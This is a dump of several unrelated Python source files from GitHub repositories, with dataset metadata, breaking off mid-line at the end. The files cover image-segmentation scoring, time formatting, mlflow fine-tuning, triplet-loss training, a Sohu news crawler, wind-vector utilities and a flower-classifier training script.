hyp_mar + ',' + str(int(hyp_rect[7]))\n mapping_fh.write(image_id + ' ' + line_id + ' ' + hyp_mar + ' ' + transcription + '\\n')\n\n\ndef get_mean_avg_scores(threshold_list, ref_dict, hyp_dict):\n \"\"\"\n Given the threshold list, it returns a tuple (mean_ap, mean_ar, stat_dict): \n mean average precision, mean average recall and statistic dictionary\n input\n -----\n If args.score_mar == true, then\n ref_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values\n hyp_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values.\n else\n ref_dict : dict(str): a dict of file basename and file path, for\n all files in the reference directory\n hyp_dict : dict(str): a dict of file basename and file path, for\n all files in the hypothesis directory\n\n threshold_list [float]: list of threshold values. MAP and MAR\n are calculated for this threshold list.\n return\n -----\n mean_ap (float): mean average precision over threshold list.\n will satsify 0 <= mean_ap <= 1\n mean_ar (float): mean average recall over threshold list.\n will satsify 0 <= mean_ar <= 1\n stat_dict dict(dict): contains precision and recall value for each\n image for each threshold\n \"\"\"\n mean_ar = 0\n mean_ap = 0\n stat_dict = {}\n for threshold in threshold_list:\n mean_recall = 0\n mean_precision = 0\n img_count = 0\n for image_id in ref_dict.keys():\n img_count += 1\n ref_data = ref_dict[image_id]\n hyp_data = hyp_dict[image_id]\n if not args.score_mar:\n ref_data = np.load(ref_data)\n hyp_data = np.load(hyp_data)\n score = get_score(ref_data, hyp_data, threshold, args.score_mar)\n precision = score['precision']\n recall = score['recall']\n mean_precision += precision\n mean_recall += recall\n precision_recall = str(precision) + \" \" + str(recall)\n if image_id not in stat_dict.keys():\n stat_dict[image_id] = dict()\n stat_dict[image_id][threshold] = precision_recall\n mean_precision /= img_count\n mean_recall /= img_count\n print(\"For threshold: {} Mean precision: {:0.3f} Mean recall: {:0.3f}\".format(\n threshold, mean_precision, mean_recall))\n mean_ap += mean_precision\n mean_ar += mean_recall\n mean_ap /= len(threshold_list)\n mean_ar /= len(threshold_list)\n print(\"Mean average precision: {} Mean average recall: {}\".\n format(mean_ap, mean_ar))\n return mean_ap, mean_ar, stat_dict\n\n\ndef write_stats_to_file(mean_ap, mean_ar, stat_dict):\n \"\"\" Given mean average precision, mean average recall\n and statistic dictionary, it writes image_id, threshold,\n precision and recall value in args.result text file.\n input\n -----\n mean_ap (float): mean average precision over threshold list.\n will satsify 0 <= mean_ap <= 1.\n mean_ar (float): mean average recall over threshold list.\n will satsify 0 <= mean_ar <= 1\n stat_dict dict(dict): contains precision and recall value for each\n image for each threshold\n \"\"\"\n result_file = os.path.join(args.result, 'scoring_result.txt')\n with open(result_file, 'w') as result_fh:\n result_fh.write('Mean Average Precision: {}\\n'.format(mean_ap))\n result_fh.write('Mean Average Recall: {}\\n'.format(mean_ar))\n result_fh.write('ImageID Threshold Recall\\n')\n for image_id in stat_dict.keys():\n for threshold in stat_dict[image_id].keys():\n recall = stat_dict[image_id][threshold]\n result_fh.write('{} {} {}\\n'.format(image_id, threshold, recall))\n print('Saved to {}'.format(result_file))\n\n\ndef read_rect_coordinates(file_name):\n \"\"\" Given the file name, it reads mask_id and rectangle\n coordinates from the file. It finally returns a image_rect_dict.\n A file should contain mask_id and the co-ordinates of the \n minimum area rectangle that covers the mask with that mask id, \n in the form of a counter-clockwise list of points. A mar is \n described by 8 values (h1,w1,h2,w2,h3,w3,h4,w4), in the format:\n h1,w1,h2,w2,h3,w3,h4,w4\n for example:\n HYT_ARB_20070103.0066_4_LDC0061 25,179,15,178,16,70,26,71\n return\n ------\n image_rect_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values (h1,w1,h2,w2,h3,w3,h4,w4)\n \"\"\"\n image_rect_dict = dict()\n with open(file_name) as f:\n for line in f:\n line_vect = line.strip().split(' ')\n image_id = line_vect[0].split('$')[0]\n line_id = line_vect[0].split('$')[1]\n rect_coordinates = line_vect[1].split(',')\n if image_id not in image_rect_dict.keys():\n image_rect_dict[image_id] = list()\n image_rect_dict[image_id].append(rect_coordinates)\n return image_rect_dict\n\n\ndef read_rect_coordinates_and_transcription(file_name):\n \"\"\" Given the file name, it reads mask_id, rectangle\n coordinates and transcription from the file. It finally\n returns a image_rect_dict. A file should contain mask_id and\n the co-ordinates of the mar that covers the mask with that mask id,\n in the form of a counter-clockwise list of points. A mar is\n described by 8 values (h1,w1,h2,w2,h3,w3,h4,w4), in the format:\n h1,w1,h2,w2,h3,w3,h4,w4\n for example:\n HYT_ARB_20070103.0066_4_LDC0061 25,179,15,178,16,70,26,71\n return\n ------\n image_rect_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values (h1,w1,h2,w2,h3,w3,h4,w4)\n \"\"\"\n image_rect_dict = dict()\n with open(file_name) as f:\n for line in f:\n line_vect = line.strip().split(' ')\n image_id = line_vect[0][:-5]\n line_id = line_vect[0]\n rect_coordinates = line_vect[1].split(',')\n transcription = \" \".join(line_vect[2:])\n if image_id not in image_rect_dict.keys():\n image_rect_dict[image_id] = dict()\n image_rect_dict[image_id][line_id] = (rect_coordinates, transcription)\n #image_rect_dict[image_id].append((rect_coordinates, transcription))\n return image_rect_dict\n\n\ndef get_filenames_from_directory():\n \"\"\" Given the hypothesis and reference directory name, it returns\n two dicts containing file name of each directory respectively. It\n checks if both directory contains same files names.\n To do: add partial scoring option similar to kaldi.\n return\n ------\n ref_file_dict : dict(str): a dict of file basename and file path, for\n all files in the reference directory\n hyp_file_dict : dict(str): a dict of file basename and file path, for\n all files in the hypothesis directory\n \"\"\"\n\n ref_file_dict = dict()\n hyp_file_dict = dict()\n for img_ref_path, img_hyp_path in zip(glob(args.reference + \"/*.mask.npy\"),\n glob(args.hypothesis + \"/*.mask.npy\")):\n\n ref_id = os.path.basename(img_ref_path).split('.mask.npy')[0]\n hyp_id = os.path.basename(img_hyp_path).split('.mask.npy')[0]\n ref_file_dict[ref_id] = img_ref_path\n hyp_file_dict[hyp_id] = img_hyp_path\n\n assert len(ref_file_dict) == len(hyp_file_dict)\n\n for file_id in ref_file_dict.keys():\n if file_id not in hyp_file_dict.keys():\n raise Exception(\"mask flie (np array): {} missing in reference directory\".format(file_id))\n\n return ref_file_dict, hyp_file_dict\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"hhadian/waldo","sub_path":"egs/madcat_arabic/v1/scoring/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"3528131656","text":"# -*- coding: utf-8 -*-\n\"\"\" 時刻関連のユーティリティ \"\"\"\n\n# 時刻のフォーマット\nFORMAT_RFC3339 = \"%FT%T+0000\"\nFORMAT_RFC2822 = \"%a, %d %b %Y %T +0000\"\nFORMAT_RFC822 = \"%a, %d %b %y %T +0000\"\nFORMAT_RFC1123 = \"%a, %d %b %Y %H:%M:%S %Z\"\n\n\ndef unixtime(microsec = False):\n\t\"\"\" Unixタイムスタンプを取得\n\n\t@param microsec: マイクロ秒(浮動小数点数)で取得するならTrue\n\t@return: Unixタイムスタンプ\n\t\"\"\"\n\tfrom time import time\n\tt = time()\n\tif microsec:\n\t\treturn t\n\n\treturn int(t)\n\n\ndef format_unixtime(format = FORMAT_RFC2822, timestamp = None):\n\t\"\"\" Unixタイムスタンプをフォーマッティング\n\n\t@param format: フォーマット文字列; strftime()の書式またはFORMAT_RFCxxx\n\t@param timestamp: Unixタイムスタンプ; 省略時は現在時刻\n\t@return: フォーマット後の時刻\n\t@requires: pytz\n\t\"\"\"\n\tfrom datetime import datetime\n\timport pytz\n\tif timestamp == None:\n\t\ttimestamp = unixtime()\n\n\treturn datetime.fromtimestamp(timestamp, tz = pytz.utc).strftime(format)\n\n\ndef _test():\n\t\"\"\" テスト \"\"\"\n\tprint(format_unixtime())\n\tprint(format_unixtime(FORMAT_RFC822))\n\tprint(format_unixtime(FORMAT_RFC3339))\n\n\nif __name__ == \"__main__\":\n\t_test()\n","repo_name":"shimataro/brocadefw","sub_path":"brocadefw/utilities/timeutils.py","file_name":"timeutils.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"3102788927","text":"import os\r\nimport warnings\r\n\r\nimport hydra # need install hydra\r\nfrom omegaconf import DictConfig, OmegaConf # need install omegaconf\r\nimport mlflow\r\nfrom torch.utils.tensorboard import SummaryWriter\r\n\r\nimport utils\r\nfrom common import FineTuner\r\n\r\n\r\n@hydra.main(config_path='params', config_name='fine_tune')\r\ndef main(cfg: DictConfig):\r\n if cfg.experiment_params.debug_mode:\r\n warnings.warn('This training is DEBUG MODE')\r\n\r\n # # # setting dir root\r\n wd_root_dict = {}\r\n wd_root_dict['current'] = hydra.utils.get_original_cwd() # current root\r\n wd_root_dict['hydra'] = os.getcwd() # hydra save root\r\n wd_root_dict['output'] = f'{wd_root_dict[\"current\"]}/{cfg.experiment_params.output_dir}' # mlflow save root\r\n os.chdir(wd_root_dict['current'])\r\n\r\n # # # mlflow logger setting\r\n # load pretrain mlflow logger\r\n pretrain_mlflow_logger = utils.MlflowLogger(experiment_name='train', wd_root_dict=wd_root_dict)\r\n pretrain_mlflow_logger.set_run_id_from_run_name(cfg.experiment_params.pretrain_run_name)\r\n\r\n # set experiment_id\r\n mlflow_logger = utils.MlflowLogger(experiment_name='fine_tune', wd_root_dict=wd_root_dict)\r\n mlflow_logger.create_run(cfg.experiment_params.run_name, cfg.experiment_params.debug_mode)\r\n mlflow_logger.log_tag(key=\"run_id\", value=mlflow_logger.run_id)\r\n print(f'Experiment [Name: {mlflow_logger.experiment_name}, Id: {mlflow_logger.experiment_id}]')\r\n print(f'Run [Name: {mlflow_logger.run_name}, Id: {mlflow_logger.run_id}]')\r\n # save params info to mlflow result\r\n mlflow_logger.log_params_from_omegaconf_dict(cfg, save_dir='fine_tune_hydra_config')\r\n\r\n # tensorboard logger setting\r\n tb_root = f'{wd_root_dict[\"output\"]}/tensorboard/{mlflow_logger.experiment_name}/{mlflow_logger.run_name}'\r\n tb_logger = SummaryWriter(tb_root)\r\n\r\n # get pretrain_config\r\n pretrain_hydra_config_root = f'{pretrain_mlflow_logger.get_artifact_root()}/train_hydra_config' # get trained network name\r\n pretrain_cfg = OmegaConf.load(f'{pretrain_hydra_config_root}/.hydra/config.yaml')\r\n\r\n # set seed (se pretrain seed)\r\n utils.seed_settings(pretrain_cfg.experiment_params.seed) # seedがNoneの場合,ランダムシード\r\n\r\n # set trainer and run\r\n trainer = FineTuner(cfg, mlflow_logger, pretrain_mlflow_logger, tb_logger)\r\n # # run\r\n trainer.run()\r\n tb_logger.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"rawss777/verify_self_supervised_learning","sub_path":"fine_tune.py","file_name":"fine_tune.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41593049447","text":"import os\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nimport torchvision\nfrom torchvision.models.resnet import resnet18, resnet34\n\n\nfrom pytorch_lightning import LightningDataModule, LightningModule\n\nfrom online_triplet_loss.losses import *\n\nfrom dataset import StanfordProductsOnlineDataset, Item\n\n\nclass StanfordProductsDataModule(LightningDataModule):\n def __init__(self, train_ann_file, dataset_dir, transforms=None, batch_size=8):\n super(StanfordProductsDataModule, self).__init__()\n\n items = []\n with open(train_ann_file, \"r\") as f:\n skip_header = True\n for line in f:\n if skip_header:\n skip_header = False\n continue\n\n img_idx, cls_idx, super_idx, name = line.split()\n items.append(Item(os.path.join(dataset_dir, name), int(cls_idx)))\n\n if transforms is None:\n transforms = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Resize((224, 224)),\n ])\n\n self.train = StanfordProductsOnlineDataset(items[:-3000], transforms)\n self.val = StanfordProductsOnlineDataset(items[-3000:], transforms)\n\n self.batch_size = batch_size\n\n def train_dataloader(self):\n return DataLoader(self.train, batch_size=self.batch_size, shuffle=True, num_workers=6)\n\n def val_dataloader(self):\n return DataLoader(self.val, batch_size=self.batch_size, shuffle=False, num_workers=6)\n\n def test_dataloader(self):\n return DataLoader(self.val, batch_size=self.batch_size, shuffle=False, num_workers=6)\n\n\nclass StanfordProductsModel(LightningModule):\n def __init__(self):\n super().__init__()\n\n self.lr = 1e-3\n\n model = resnet34(pretrained=True)\n model.fc = torch.nn.Identity()\n\n self.model = model\n self.criterion = batch_hard_triplet_loss\n\n def forward(self, z):\n return self.model(z)\n\n def training_step(self, batch, batch_idx):\n imgs, positive_images, labels = batch\n imgs = torch.cat((imgs, positive_images))\n labels = torch.cat((labels, labels))\n embeddings = self.model(imgs)\n\n loss = self.criterion(labels, embeddings, margin=0.2, device=self.device)\n self.log('loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n imgs, positive_images, labels = batch\n imgs = torch.cat((imgs, positive_images))\n labels = torch.cat((labels, labels))\n embeddings = self.model(imgs)\n\n loss = batch_hard_triplet_loss(labels, embeddings, margin=0.2, device=self.device, squared=True)\n self.log('val_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n\n return loss\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.lr)\n","repo_name":"Zebraside/sop","sub_path":"sop/lightning_modules.py","file_name":"lightning_modules.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11314360857","text":"from django.db import models\n\nfrom hw57.models.issuetype import IssueType\n\n\nclass Issue(models.Model):\n summary = models.CharField(\n max_length=100,\n null=False,\n blank=False,\n verbose_name='Краткое описание'\n )\n description = models.TextField(\n max_length=254,\n null=True,\n verbose_name='Полное описание'\n )\n status = models.ForeignKey(\n to='hw57.Status',\n on_delete=models.PROTECT\n )\n type = models.ManyToManyField(\n to='hw57.Type',\n related_name='issues',\n through=IssueType,\n through_fields=('issue', 'type'),\n blank=True\n )\n created_date = models.DateTimeField(\n verbose_name='Дата и время создания',\n auto_now_add=True\n )\n updated_date = models.DateTimeField(\n verbose_name='Дата и время обновления',\n auto_now=True\n )\n\n def __str__(self):\n return f'{self.summary}, {self.status}, {self.type}'\n\n class Meta:\n verbose_name = 'Задача'\n verbose_name_plural = 'Задачи'\n","repo_name":"nurlansapyzhan/homework_57_nurlan_sapyzhan","sub_path":"source/hw57/models/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29533451505","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport datetime\nimport QueueManager\nimport isVisited\nimport database\nfrom tqdm import tqdm\n\nstoplist = [\"javascript:void(0)\"]\nwebsite_list = [\"news.sohu.com\"]\nMAX_ITERATION = 10000\n\n\"\"\"\nclass Webpage(object):\n def __init__(self, link, title, date, content):\n self.link = link\n self.b_title = title\n self.date = date\n self.b_content = content\n\"\"\"\n\ndef space_to_dash(string):\n # print(string)\n new_string = []\n # string = string.split('')\n for char in string:\n if char == ' ':\n new_string.append('_')\n else:\n new_string.append(char)\n new_string = ''.join(new_string)\n return new_string\n\ndef Webpage(link, byte_title, date, byte_content):\n page = {}\n page['link'] = link\n page['byte_title'] = byte_title\n page['date'] = date\n page['byte_content'] = byte_content\n return page\n\n\ndef load_html(url):\n error_log = open(\"error.log\", 'a')\n try:\n response = urllib.request.urlopen(url)\n html = response.read()\n except:\n print(\"error opening: \" + url)\n error_log.write(url + '\\n')\n error_log.close()\n return None\n\n error_log.close()\n return html\n\n\n# this\"fil...add...\" function is under construction!\ndef filtered_addtolist(link, link_queue, link_visited):\n try:\n http_flag = (link[:4] == 'http')\n except:\n http_flag = False\n if link not in stoplist and \\\n link not in link_visited and \\\n http_flag:\n for website in website_list:\n if website in link:\n link_queue.put(link)\n # print (link)\n return\n\n\ndef parse_an_article(link_queue=QueueManager.list_init(),\n link_visited=isVisited.init()):\n target_url = link_queue.get()\n if target_url in link_visited or target_url in stoplist:\n return link_queue, link_visited\n # html = open('test.html', encoding='utf8').read()\n print(target_url)\n html = load_html(target_url)\n link_visited[target_url] = True\n\n try:\n soup = BeautifulSoup(html, 'html.parser')\n except:\n return link_queue, link_visited\n\n # get date\n date = None\n try:\n time_stamp = int(soup.find(id='news-time')['data-val'])/1000\n date = datetime.datetime.fromtimestamp(time_stamp)\n # time is scaled at seconds\n except:\n try:\n raw_date = soup.find(id='pubtime_baidu')['content']\n date = datetime.datetime.strptime(raw_date, \"%Y-%m-%dT%H:%M:%S+08:00\")\n except:\n try:\n raw_date = soup.find(id='pubtime_baidu').string\n date = datetime.datetime.strptime(raw_date, \"%Y-%m-%d %H:%M:%S\")\n except:\n pass\n\n byte_title = soup.title.string\n\n # now parsing the body part\n byte_content = \"\"\n try:\n article = soup.find('article')\n for string in article.strings:\n byte_content += string\n # byte_content = byte_content.encode('utf8')\n except:\n article = soup.find(itemprop='articleBody')\n try:\n descendants = article.descendants\n for tag in article.descendants:\n if tag.name == 'p':\n # byte_content += tag.string\n try:\n byte_content += tag.string\n except:\n try:\n byte_content += tag.br.string\n except:\n pass\n byte_content += '\\n'\n except:\n pass\n # parsing finished\n\n for raw_link in soup.find_all('a'):\n filtered_addtolist(raw_link.get('href'), link_queue, link_visited)\n\n page = Webpage(target_url, byte_title, date, byte_content)\n date_filename = space_to_dash(str(date))\n database.save(date_filename, byte_content)\n print(date_filename)\n return link_queue, link_visited\n\n\nif __name__ == '__main__':\n while True:\n link_queue = QueueManager.list_init()\n link_visited = isVisited.init()\n for iter_count in tqdm(range(MAX_ITERATION)):\n link_queue, link_visited\\\n = parse_an_article(link_queue, link_visited)\n print(\"now start saving\")\n QueueManager.list_save(link_queue)\n isVisited.save(link_visited)\n print(\"saving complete\")\n while True:\n user_input = input(\"continue?\\n(y/n)\")\n if user_input == 'y':\n break\n if user_input == 'n':\n exit(0)\n","repo_name":"mark14wu/ICT_spider","sub_path":"html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2976152241","text":"import math\nimport sys\nfrom datetime import datetime\nimport pytz\nimport numpy\n\ndef speed(uWind, vWind):\n \"\"\"Returns wind speed from orthogonal (u and v) wind components which can be scalars, lists, or numpy.arrays.\"\"\"\n\n speed = numpy.sqrt(numpy.power(numpy.array(uWind), 2.0) + numpy.power(numpy.array(vWind), 2.0))\n\n if speed.shape == (1, ):\n return speed[0]\n else:\n return speed\n\n\ndef u_flow(speed, direction):\n \"\"\"Returns the U-direction scalar (degrees, north-up).\"\"\"\n\n # Convert to numpy arrays\n speed = numpy.array(speed)\n direction = numpy.array(direction)\n\n # Check args\n assert(numpy.all(speed >= 0))\n assert(numpy.all(0 <= direction) and numpy.all(direction < 360))\n\n u = numpy.sin(numpy.radians(direction))*speed\n\n if u.shape == (1, ):\n return u[0]\n else:\n return numpy.array(u)\n\n\ndef u_met(speed, direction):\n \"\"\"Returns the speed in the U using the meteorological convention of FROM.\"\"\"\n\n return -u_flow(speed, direction)\n\n\ndef v_flow(speed, direction):\n \"\"\"Returns the V-direction scalar (degrees, north-up).\"\"\"\n\n # Convert to numpy arrays\n speed = numpy.array(speed)\n direction = numpy.array(direction)\n\n # Check args\n assert(numpy.all(speed >= 0))\n assert(numpy.all(0 <= direction) and numpy.all(direction < 360))\n\n v = numpy.cos(numpy.radians(direction))*speed\n\n if v.shape == (1, ):\n return v[0]\n else:\n return numpy.array(v)\n\n\ndef v_met(speed, direction):\n \"\"\"Returns the speed in the V using the meteorological convention of FROM.\"\"\"\n\n return -v_flow(speed, direction)\n\n\ndef calc_dir_deg(u, v):\n \"\"\"Calculates the direction from the orthogonal wind components.\n *\n * u U wind scalar velocity.\n * v V wind scalar velocity.\n\n * Returns he direction that a flow is going (i.e. not wind direction which is 180 degrees opposite).\n \"\"\"\n\n import math\n\n # Calculate the direction and round it into a integer\n direction = math.degrees(math.atan2(u, v))\n\n # Convert to a positive direction\n if direction < 0:\n direction += 360\n\n return direction\n\ndef nanHelper(y):\n \"\"\"Helper to handle indices and logical indices of NaNs.\n From: http://stackoverflow.com/questions/6518811/interpolate-nan-values-in-a-numpy-array\n\n Input:\n - y, 1d numpy array with possible NaNs\n Output:\n - nans, logical indices of NaNs\n - index, a function, with signature indices= index(logical_indices),\n to convert logical indices of NaNs to 'equivalent' indices\n Example:\n >>> # linear interpolation of NaNs\n >>> nans, x= nan_helper(y)\n >>> y[nans]= numpy.array(np.interp(x(nans), x(~nans), y[~nans]),dtype=np.float32)\n \"\"\"\n import numpy as np\n\n return np.isnan(y), lambda z: z.nonzero()[0]\n\ndef getDomainExtents(geogridFilename,paddingDegrees = 0.):\n \"\"\"Finds the latitude and longitude domain extent from a geo_em.d0[X].nc .\n\n geogridFile - geo_em.d0[X].nc file name, can include directories\n paddingDegrees - decimal degrees to pad the domain with, default 0\n\n return minLong, maxLong, minLat, maxLat\n \"\"\"\n\n import scipy.io.netcdf as nc\n import numpy as np\n\n\n # Open the file\n file = open(geogridFilename, 'r')\n ncFile = nc.netcdf_file(file, 'r')\n\n # Get the lat and long dimensions\n xDim = ncFile.dimensions['west_east_stag']\n yDim = ncFile.dimensions['south_north_stag']\n\n # Get the long and lat variables, using the U and V respectively because the extend out of the domain the most\n longVar = ncFile.variables['XLONG_U']\n latVar = ncFile.variables['XLAT_V']\n\n # Get the mins and maxes\n minLong = np.min(longVar[0,:,0])\n maxLong = np.max(longVar[0,:,xDim - 1])\n minLat = np.min(latVar[0,0,:])\n maxLat = np.max(latVar[0,yDim - 1, :])\n\n # Close the file\n ncFile.close()\n\n return minLong - paddingDegrees, maxLong + paddingDegrees, minLat - paddingDegrees, maxLat + paddingDegrees\n\ndef get_deg_from_cardinal(cardinal):\n \"\"\"Returns the direction in degrees for a 16-sector cardinal direction (e.g. WSW, NE, etc...)\n \"\"\"\n\n dirdeg = {'N': 0,'NNE': 22.5, 'NE': 45.0, 'ENE': 67.5, 'E': 90.0, 'ESE': 112.5, 'SE': 135.0, 'SSE': 157.5,\n 'S': 180.0, 'SSW': 202.5, 'SW': 225.0, 'WSW': 247.5, 'W': 270.0, 'WNW': 292.5, 'NW': 315.0, 'NNW': 337.5}\n\n # Raises key error if not found\n try:\n return dirdeg[cardinal]\n except:\n raise\n\ndef get_cardinal_from_deg(dir):\n \"\"\"Returns a 16-sector cardinal direction (e.g. WSW, NE, etc...) for a direction in degrees\n \"\"\"\n\n if dir >= 337.5 and dir < 360 or dir < 22.5:\n return 'N';\n elif dir >= 22.5 and dir < 67.5:\n return 'NE'\n elif dir >= 67.5 and dir < 112.5:\n \t return 'E'\n elif dir >= 112.5 and dir < 157.5:\n return 'SE'\n elif dir >= 157.5 and dir < 202.5:\n \t return 'S'\n elif dir >= 202.5 and dir < 247.5:\n return 'SW'\n elif dir >= 247.5 and dir < 292.5:\n \t return 'W'\n elif dir >= 292.5 and dir < 337.5:\n return 'NW'\n else:\n return None\n\n\ndef none2NaN(x):\n \"\"\"Converts None objects in a 1D array to nan, for use in NumPy arrays. Returns an array.\n Found at: http://scienceoss.com/convert-none-to-nan-for-use-in-numpy-arrays/\"\"\"\n import numpy as np\n newlist = []\n for i in x:\n if i is not None:\n newlist.append(i)\n else:\n newlist.append(np.nan)\n return np.array(newlist)","repo_name":"wxmiked/windb2","sub_path":"windb2/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"9298929875","text":"# Imports here\nimport os, sys\nimport argparse\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\n# define command line inputs\nparser = argparse.ArgumentParser(description= 'Train.py')\nparser.add_argument('--data_dir', type= str, help='Enter data folder name (somefolder)' )\nparser.add_argument('--save_dir', type= str, help = 'Enter checkpoint name (something.pth)')\nparser.add_argument('--arch', dest= 'arch', type= str, default= 'vgg16', choices= ['densenet', 'alexnet', 'vgg'], help= 'choose model architecture')\nparser.add_argument('--drop_p', dest= 'drop_p', type=float, default= 0.5, help= 'drop percentage (0.5)')\nparser.add_argument('--gpu', dest= 'gpu', action= 'store_true', help= 'enable GPU')\nparser.add_argument('--epochs', dest= 'epochs', default= 3, type= int)\nparser.add_argument('--learning_rate', dest= 'learning_rate', type= float, default= 0.001, help= 'model learning rate')\nparser.add_argument('--hidden_units', dest= 'hidden_units', type= int, nargs= '+')\n\nargs = parser.parse_args()\n\ndef model_builder(arch):\n if 'vgg' in arch:\n model = models.vgg16(pretrained= True)\n elif 'alexnet' in arch:\n model = models.alexnet(pretrained= True)\n elif 'densenet' in arch:\n model = models.densenet161(pretrained= True)\n else:\n print('Model architecture unknown. Using vgg16...')\n model = models.vgg16(pretrained= True)\n\n for param in model.parameters():\n param.requires_grad = False\n return model\n\ndef print_model(arch, hidden_units, model):\n print('Model Architecture: ', arch.title())\n print('Hidden Layers: ', hidden_units)\n print('Model: \\n', model)\n\n\ndef validation(model, validloader, criterion):\n test_loss = 0\n accuracy = 0\n model.eval()\n model.to(device)\n\n for images, labels in validloader:\n images, labels = images.to(device), labels.to(device)\n\n output = model.forward(images)\n test_loss += criterion(output, labels).item()\n\n probs = torch.exp(output) # classifier output is LogSoftmax\n check = (labels.data == probs.max(dim= 1)[1])\n accuracy += check.type(torch.FloatTensor).mean()\n\n return test_loss, accuracy\n\n\ndef train_model(model, trainloader, validloader, criterion, optimizer, device, epochs=3):\n\n steps = 0\n running_loss = 0\n print_every = 40\n\n for e in range(epochs):\n model.classifier.train()\n model.to(device)\n\n for images, labels in trainloader:\n images, labels = images.to(device), labels.to(device)\n\n steps += 1\n optimizer.zero_grad()\n\n outputs = model.forward(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n if steps % print_every == 0:\n model.eval()\n\n with torch.no_grad():\n test_loss, accuracy = validation(model, validloader, criterion)\n\n print('Epoch: {}/{}...'.format(e+1, epochs),\n 'Training Loss: {:.3f} '.format(running_loss / print_every),\n 'Validation Loss: {:.3f} '.format(test_loss / len(validloader)),\n 'Validation Accuracy: {:.2f}%'.format(accuracy / len(validloader) * 100))\n\n running_loss = 0\n model.classifier.train()\n\n\nclass create_classifier (nn.Module):\n def __init__(self, input_size, output_size, hidden_layers, drop_p= 0.5):\n super().__init__()\n self.nn_hidden_layers = nn.ModuleList([nn.Linear(input_size, hidden_layers[0])])\n layer_sizes = zip(hidden_layers[:-1], hidden_layers[1:])\n self.nn_hidden_layers.extend([nn.Linear(h1, h2) for h1, h2 in layer_sizes])\n self.output = nn.Linear(hidden_layers[-1], output_size)\n self.dropout = nn.Dropout(drop_p)\n\n def forward(self, x):\n for linear in self.nn_hidden_layers:\n x = F.relu(linear(x))\n x = self.dropout(x)\n\n x = self.output(x)\n F.log_softmax(x, dim=1)\n return F.log_softmax(x, dim=1)\n\nif __name__ == '__main__':\n model = model_builder(args.arch)\n features = list(model.classifier.children())[:-1]\n\n if 'alexnet' in args.arch:\n input_size = features[1].in_features\n elif 'vgg' in args.arch:\n input_size = features[0].in_features\n else:\n input_size = model.classifier.in_features\n\n output_size = 102\n drop_p = args.drop_p\n learning_rate = args.learning_rate\n\n if '--hidden_layers':\n hidden_layers = list(args.hidden_units)\n else:\n hidden_layers = [4096, 2048, 512]\n\n classifier = create_classifier(input_size, output_size, hidden_layers, drop_p)\n model.classifier = classifier\n print_model(args.arch, hidden_layers, model)\n\n cw_dir = os.path.abspath(os.path.curdir)\n\n if args.data_dir == None:\n data_folder = os.path.join(cw_dir, 'flowers')\n else:\n data_folder = os.path.join(cw_dir, args.data_dir)\n\n\n train_dir = os.path.join(data_folder, 'train')\n valid_dir = os.path.join(data_folder, 'valid')\n test_dir = os.path.join(data_folder, 'test')\n\n # define transforms for the training, validation, and testing sets\n train_transforms = transforms.Compose([transforms.Resize([224, 224]),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n test_transforms = transforms.Compose([transforms.Resize([224, 224]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n # define datasets\n train_data = datasets.ImageFolder(train_dir, transform= train_transforms)\n test_data = datasets.ImageFolder(test_dir, transform= test_transforms)\n valid_data = datasets.ImageFolder(valid_dir, transform= test_transforms)\n\n # define the dataloaders\n trainloader = torch.utils.data.DataLoader(train_data, batch_size=32, shuffle= True)\n testloader = torch.utils.data.DataLoader(test_data, batch_size=32, shuffle= True)\n validloader = torch.utils.data.DataLoader(valid_data, batch_size=32, shuffle= True)\n\n # set device to gpu or cpu\n if args.gpu:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n else:\n device = 'cpu'\n\n # define criterion and optimizer\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(), lr= learning_rate) # optimizer set for classifier\n\n train_model(model, trainloader, validloader, criterion, optimizer, device, args.epochs)\n\n if args.save_dir:\n chkpt_dir = os.path.join(cw_dir, args.save_dir)\n else:\n chkpt_dir = os.path.join(cw_dir, 'model_chkpt.pth')\n\n model.class_to_idx 